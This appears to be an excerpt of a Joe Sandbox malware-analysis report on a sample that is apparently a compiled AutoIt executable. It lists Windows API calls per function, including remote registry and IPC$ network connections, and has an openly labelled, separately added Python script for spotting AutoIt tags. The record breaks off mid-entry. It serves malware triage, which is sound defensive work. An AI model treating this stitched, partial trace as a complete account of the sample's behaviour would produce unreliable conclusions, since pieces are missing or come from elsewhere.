                                                                                                                • Instruction ID: 4ffb965456b6a301baedc2b3a60092fb5330783701bac98228fccce1f55c556b
                                                                                                                • Opcode Fuzzy Hash: b10750d798dc233b96adb3145f070c6cc58282cb3532fcfe9a273a9ecbe8df8c
                                                                                                                • Instruction Fuzzy Hash: E0513B711083459FC700EF19C89196BB7E8FF96718F10486DF89A97261DB71AD09CB52
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0091E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0093F8DF
                                                                                                                • LoadStringW.USER32(00000000,?,0091E029,00000001), ref: 0093F8E8
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,009A5310,?,00000FFF,?,?,0091E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0093F90A
                                                                                                                • LoadStringW.USER32(00000000,?,0091E029,00000001), ref: 0093F90D
                                                                                                                • __swprintf.LIBCMT ref: 0093F95D
                                                                                                                • __swprintf.LIBCMT ref: 0093F96E
                                                                                                                • _wprintf.LIBCMT ref: 0093FA17
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0093FA2E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                • API String ID: 984253442-2268648507
                                                                                                                • Opcode ID: 113814798b315813de85cf5a88159ec4b8dd30234111539aed85b008bf87b992
                                                                                                                • Instruction ID: 04c8e45b61c3252e0a90c05fabd4d5efc4b71da0df5bafbb961b767929a2cd72
                                                                                                                • Opcode Fuzzy Hash: 113814798b315813de85cf5a88159ec4b8dd30234111539aed85b008bf87b992
                                                                                                                • Instruction Fuzzy Hash: 56413A72904149AACF04FBE9DD96EEE777CEF56350F100065F506E60A2EA316F09CB62
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00969207,?,?), ref: 0096BA56
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00969207,?,?,00000000,?), ref: 0096BA6D
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00969207,?,?,00000000,?), ref: 0096BA78
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00969207,?,?,00000000,?), ref: 0096BA85
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0096BA8E
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00969207,?,?,00000000,?), ref: 0096BA9D
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0096BAA6
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00969207,?,?,00000000,?), ref: 0096BAAD
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00969207,?,?,00000000,?), ref: 0096BABE
                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00972CAC,?), ref: 0096BAD7
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0096BAE7
                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0096BB0B
                                                                                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0096BB36
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0096BB5E
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0096BB74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3840717409-0
                                                                                                                • Opcode ID: 0a74c394d74e847e559cccf32159827379c1d7954c6119b7c78de1938fc371b4
                                                                                                                • Instruction ID: 4e115ee414d4b4a8dff7ff6f9b8c745b3f5d94f01e641fd89f14b5dec2e42ffa
                                                                                                                • Opcode Fuzzy Hash: 0a74c394d74e847e559cccf32159827379c1d7954c6119b7c78de1938fc371b4
                                                                                                                • Instruction Fuzzy Hash: 57414975604208EFDB119FA5EC98EAABBBCFF89711F104068F905D7260E7709D41EB20
                                                                                                                APIs
                                                                                                                • __wsplitpath.LIBCMT ref: 0094DA10
                                                                                                                • _wcscat.LIBCMT ref: 0094DA28
                                                                                                                • _wcscat.LIBCMT ref: 0094DA3A
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0094DA4F
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0094DA63
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0094DA7B
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 0094DA95
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0094DAA7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 34673085-438819550
                                                                                                                • Opcode ID: 83231722231ef8c82bd39d8f0a77ca58e0ecda2c76750cabf59b902d11c796d8
                                                                                                                • Instruction ID: fe4b13dbf0ae8aab8f8f4ebf1cdacb529191ab64815bf9e8019afa3976582b8c
                                                                                                                • Opcode Fuzzy Hash: 83231722231ef8c82bd39d8f0a77ca58e0ecda2c76750cabf59b902d11c796d8
                                                                                                                • Instruction Fuzzy Hash: B381807650A2419FCB24EF68C844EAAB7E8FF89310F184C2EF889C7251E674DD44CB52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0096C1FC
                                                                                                                • GetFocus.USER32 ref: 0096C20C
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0096C217
                                                                                                                • _memset.LIBCMT ref: 0096C342
                                                                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0096C36D
                                                                                                                • GetMenuItemCount.USER32(?), ref: 0096C38D
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 0096C3A0
                                                                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0096C3D4
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0096C41C
                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0096C454
                                                                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0096C489
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1296962147-4108050209
                                                                                                                • Opcode ID: 9b86b8a1198ffbc8f3e80c829ec476c11959c958ca180b0aea5849947c1c7b77
                                                                                                                • Instruction ID: 1284d93c0293074b131f0e45eba703b0c773e85e0e1145d6fcdc9ab2b6eb1a2d
                                                                                                                • Opcode Fuzzy Hash: 9b86b8a1198ffbc8f3e80c829ec476c11959c958ca180b0aea5849947c1c7b77
                                                                                                                • Instruction Fuzzy Hash: 67818BB0209301AFD710CF24D894A7BBBE8FF89754F00492EF995972A1DB70D905DBA2
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 0095738F
                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0095739B
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 009573A7
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 009573B4
                                                                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00957408
                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00957444
                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00957468
                                                                                                                • SelectObject.GDI32(00000006,?), ref: 00957470
                                                                                                                • DeleteObject.GDI32(?), ref: 00957479
                                                                                                                • DeleteDC.GDI32(00000006), ref: 00957480
                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 0095748B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2598888154-3887548279
                                                                                                                • Opcode ID: 6477cea5464fdee88a0525e854ba21a0949e2f63a982ed320a8fdd4d2daa403d
                                                                                                                • Instruction ID: 2832391357c7b8fb0a3a96a265b6b88784cb2da9f32c93de73104d5d7418e896
                                                                                                                • Opcode Fuzzy Hash: 6477cea5464fdee88a0525e854ba21a0949e2f63a982ed320a8fdd4d2daa403d
                                                                                                                • Instruction Fuzzy Hash: F1515A75908309EFCB14CFA9EC84EAEBBB9EF48310F14842DF95997210C771A944DB50
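                                                                                                                 The function entry that follows carries the strings the AutoIt runtime uses when it locates its embedded script (`AU3!`, the `EA06` version tag and the older `>>>AUTOIT SCRIPT<<<` marker), which is what backs the "compiled AutoIt script" verdict for this sample. The script below is an added triage check, not part of the Joe Sandbox report or of AutoIt itself: it scans a file for those tags and reports their offsets. The assumed layout, an `AU3!` tag immediately followed by a four-byte version tag, and the sample buffers are constructed for this example.

```python
# Added example: scan a binary for the AutoIt compiled-script tags listed
# in the function entry below. Layout assumption: "AU3!" is directly
# followed by a 4-byte version tag ("EA06" for current builds, "EA05"
# for older ones). Not taken from the report or from AutoIt's sources.
SCRIPT_TAG = b"AU3!"
VERSION_TAGS = (b"EA06", b"EA05")
LEGACY_MARKER = b">>>AUTOIT SCRIPT<<<"


def find_autoit_markers(data: bytes) -> dict:
    """Return offsets of the AutoIt script tags found in data.

    au3_tags: list of (offset, version) for each "AU3!" tag whose next
              four bytes are a known version tag.
    legacy_marker: offset of ">>>AUTOIT SCRIPT<<<" or None.
    """
    hits = {"au3_tags": [], "legacy_marker": None}
    pos = 0
    while True:
        idx = data.find(SCRIPT_TAG, pos)
        if idx < 0:
            break
        version = data[idx + 4:idx + 8]
        # A bare "AU3!" without a version tag is not counted; it can
        # occur by chance in unrelated data.
        if version in VERSION_TAGS:
            hits["au3_tags"].append((idx, version.decode("ascii")))
        pos = idx + 1
    lidx = data.find(LEGACY_MARKER)
    if lidx >= 0:
        hits["legacy_marker"] = lidx
    return hits


def looks_like_compiled_autoit(data: bytes) -> bool:
    """True when either tag form is present."""
    h = find_autoit_markers(data)
    return bool(h["au3_tags"]) or h["legacy_marker"] is not None


def scan_file(path: str) -> dict:
    """Run the check over a file on disk."""
    with open(path, "rb") as f:
        return find_autoit_markers(f.read())


# Constructed sample buffers (not bytes from the analysed sample):
# one with a well-formed tag, one with "AU3!" but no version tag.
SAMPLE_COMPILED = b"MZ" + b"\x00" * 60 + b"AU3!EA06" + b"\x11\x22" * 8
SAMPLE_PLAIN = b"MZ" + b"\x00" * 60 + b"AU3!" + b"zzzz" + b"\x00" * 8

if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(p, scan_file(p))
```

                                                                                                                 Run it as `python scan.py 6cicUo3f8g.exe`; a hit only says the file embeds an AutoIt script, extracting and reading that script is a separate step.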
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00900957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008E6B0C,?,00008000), ref: 00900973
                                                                                                                  • Part of subcall function 008E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E4743,?,?,008E37AE,?), ref: 008E4770
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008E6BAD
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 008E6CFA
                                                                                                                  • Part of subcall function 008E586D: _wcscpy.LIBCMT ref: 008E58A5
                                                                                                                  • Part of subcall function 0090363D: _iswctype.LIBCMT ref: 00903645
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                • API String ID: 537147316-1018226102
                                                                                                                • Opcode ID: 29d0dbaaa676cf29aa844036a5b0858f80cb0366e5cb0bb9746acae20ecdd67c
                                                                                                                • Instruction ID: 7b78492a2d0451dee1d0788e4598538a965feb3f5e53ad30de599dbffdb86653
                                                                                                                • Opcode Fuzzy Hash: 29d0dbaaa676cf29aa844036a5b0858f80cb0366e5cb0bb9746acae20ecdd67c
                                                                                                                • Instruction Fuzzy Hash: C9028A306083859FC710EF25C891AAFBBE5FF96358F50481DF49A972A1DB30D989CB52
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00942D50
                                                                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00942DDD
                                                                                                                • GetMenuItemCount.USER32(009A5890), ref: 00942E66
                                                                                                                • DeleteMenu.USER32(009A5890,00000005,00000000,000000F5,?,?), ref: 00942EF6
                                                                                                                • DeleteMenu.USER32(009A5890,00000004,00000000), ref: 00942EFE
                                                                                                                • DeleteMenu.USER32(009A5890,00000006,00000000), ref: 00942F06
                                                                                                                • DeleteMenu.USER32(009A5890,00000003,00000000), ref: 00942F0E
                                                                                                                • GetMenuItemCount.USER32(009A5890), ref: 00942F16
                                                                                                                • SetMenuItemInfoW.USER32(009A5890,00000004,00000000,00000030), ref: 00942F4C
                                                                                                                • GetCursorPos.USER32(?), ref: 00942F56
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00942F5F
                                                                                                                • TrackPopupMenuEx.USER32(009A5890,00000000,?,00000000,00000000,00000000), ref: 00942F72
                                                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00942F7E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3993528054-0
                                                                                                                • Opcode ID: f7717ee33649b9530cdd739645c464e757459f2c701bf86881635347e06e5463
                                                                                                                • Instruction ID: aba4deef887a8470424c4fdbd6f18e34108ed35b27141b2ea26150294a5bcfd4
                                                                                                                • Opcode Fuzzy Hash: f7717ee33649b9530cdd739645c464e757459f2c701bf86881635347e06e5463
                                                                                                                • Instruction Fuzzy Hash: 38712970604205BFEB258F54DC85FABBF68FF44324F94021AF625AA1E1C7B15C60DBA4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                • _memset.LIBCMT ref: 0093786B
                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009378A0
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009378BC
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009378D8
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00937902
                                                                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0093792A
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00937935
                                                                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0093793A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                • API String ID: 1411258926-22481851
                                                                                                                • Opcode ID: e46868541ba4b9df3a95552a48cbaae61793a8a7b9b97e4b5aa0b4a9a12b1517
                                                                                                                • Instruction ID: d9ab6ce82e22db946659eaa3ed51a15443f6e2957a4bc893e6bcd54721a548de
                                                                                                                • Opcode Fuzzy Hash: e46868541ba4b9df3a95552a48cbaae61793a8a7b9b97e4b5aa0b4a9a12b1517
                                                                                                                • Instruction Fuzzy Hash: 8B412572814229AADF21EBE9EC95DEDB7B8FF04354F004029E906A7161EB709E04CB90
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0095FDAD,?,?), ref: 00960E31
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                • API String ID: 3964851224-909552448
                                                                                                                • Opcode ID: 41a16aad7b8d3fdb1284f0f13f9426408301232ee751ff463a2f23ca0c1fd8b6
                                                                                                                • Instruction ID: e48fa69d65257b6c194cc89bf0fc8533c4c5dc188ae76c01b094ee8bb0e4a05f
                                                                                                                • Opcode Fuzzy Hash: 41a16aad7b8d3fdb1284f0f13f9426408301232ee751ff463a2f23ca0c1fd8b6
                                                                                                                • Instruction Fuzzy Hash: 7F414A3121039A8BCF21EF58D996AEF37A4AF92304F140418FC555B292DB349A1ACBA1
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0091E2A0,00000010,?,Bad directive syntax error,0096F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0093F7C2
                                                                                                                • LoadStringW.USER32(00000000,?,0091E2A0,00000010), ref: 0093F7C9
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                • _wprintf.LIBCMT ref: 0093F7FC
                                                                                                                • __swprintf.LIBCMT ref: 0093F81E
                                                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0093F88D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                • API String ID: 1506413516-4153970271
                                                                                                                • Opcode ID: 9061db71505c3cff3b4d5499767288ff1d219e26e136748f36d6e4e73bcabc28
                                                                                                                • Instruction ID: f565c46529f45c40d2fab6a88e1684bacd01a5fc9132bafb1711c2748c8f30b0
                                                                                                                • Opcode Fuzzy Hash: 9061db71505c3cff3b4d5499767288ff1d219e26e136748f36d6e4e73bcabc28
                                                                                                                • Instruction Fuzzy Hash: BA218F3290421EBFCF11EF94CC1AEEE7779FF15304F04046AF516A60A2DA719618DB51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                  • Part of subcall function 008E7924: _memmove.LIBCMT ref: 008E79AD
                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00945330
                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00945346
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00945357
                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00945369
                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0094537A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: SendString$_memmove
                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                • API String ID: 2279737902-1007645807
                                                                                                                • Opcode ID: cb6b50ce7d6f49f1b2a3783877696137b4be973616cdf92532cf9156aba5b8da
                                                                                                                • Instruction ID: c556eb42424b7c897635379a7c8fa024756f6c97082eb4286368cdada27ff38b
                                                                                                                • Opcode Fuzzy Hash: cb6b50ce7d6f49f1b2a3783877696137b4be973616cdf92532cf9156aba5b8da
                                                                                                                • Instruction Fuzzy Hash: A0118621950159BADB20BBAADC49DFFBB7CFBD7B44F100419B411D60E2EEA04D05C561
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
